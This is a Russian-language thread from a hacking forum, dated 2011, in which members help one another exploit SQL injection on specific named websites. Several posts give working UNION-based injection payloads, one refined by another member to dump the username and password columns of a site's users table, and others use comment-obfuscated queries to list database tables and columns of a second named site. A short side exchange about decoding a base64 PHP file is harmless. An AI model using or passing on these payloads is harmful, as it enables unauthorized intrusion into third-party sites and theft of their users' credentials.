HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.07.2011, 12:15
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от qaz  
Всем привет, помогите плыз разкрутить скулю,
http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729
я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?
Это ни разу не скуль. Пойми простые основы как определить есть ли скуль в запросе или нет. Простое подсовывание кавычки в запрос с последующим редиректом/выводом пустой страницы/выводом ошибки скрипта не значат о наличии скули на 100%.
 
Ответить с цитированием

  #2  
Старый 25.07.2011, 12:21
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

[user]Expl0ited[/user], вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users

http://www.gagauzia.md/search.php

"мой запрос":

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#
 
Ответить с цитированием

  #3  
Старый 25.07.2011, 12:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от 547  
[user]
Expl0ited
[/user], вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users
http://www.gagauzia.md/search.php
"мой запрос":
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#
немного модифицировал запрос

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#
 
Ответить с цитированием

  #4  
Старый 25.07.2011, 21:35
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию

исходник php файла кодирован в base64.

Но при попытке декодировать онлайн декодерами, вылезает билеберда

вот пример исходника

http://zalil.ru/31466463
 
Ответить с цитированием

  #5  
Старый 25.07.2011, 21:56
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

заюзай notepad++ например. Там что-то бинарное
 
Ответить с цитированием

  #6  
Старый 25.07.2011, 21:56
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,version%28%29,8,9

таблички вывести не получилось(

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,uhnex(hex(table_name)),8,9+from+infor mation_schema.tables --+

есть идеи?
 
Ответить с цитированием

  #7  
Старый 25.07.2011, 22:07
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,/*!concat_ws%280x3a,table_schema,table_name,column_ name%29*/,4,5,6,7,8,9+from+information_schema.columns--

же
 
Ответить с цитированием

  #8  
Старый 25.07.2011, 22:27
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
заюзай notepad++ например. Там что-то бинарное
а поподробнее можно?)
 
Ответить с цитированием

  #9  
Старый 25.07.2011, 22:34
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Cherep  
а поподробнее можно?)
в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.

Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.

p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.
 
Ответить с цитированием

  #10  
Старый 25.07.2011, 22:45
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.
Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.
p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.
ладно пасиба, буду пробывать)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.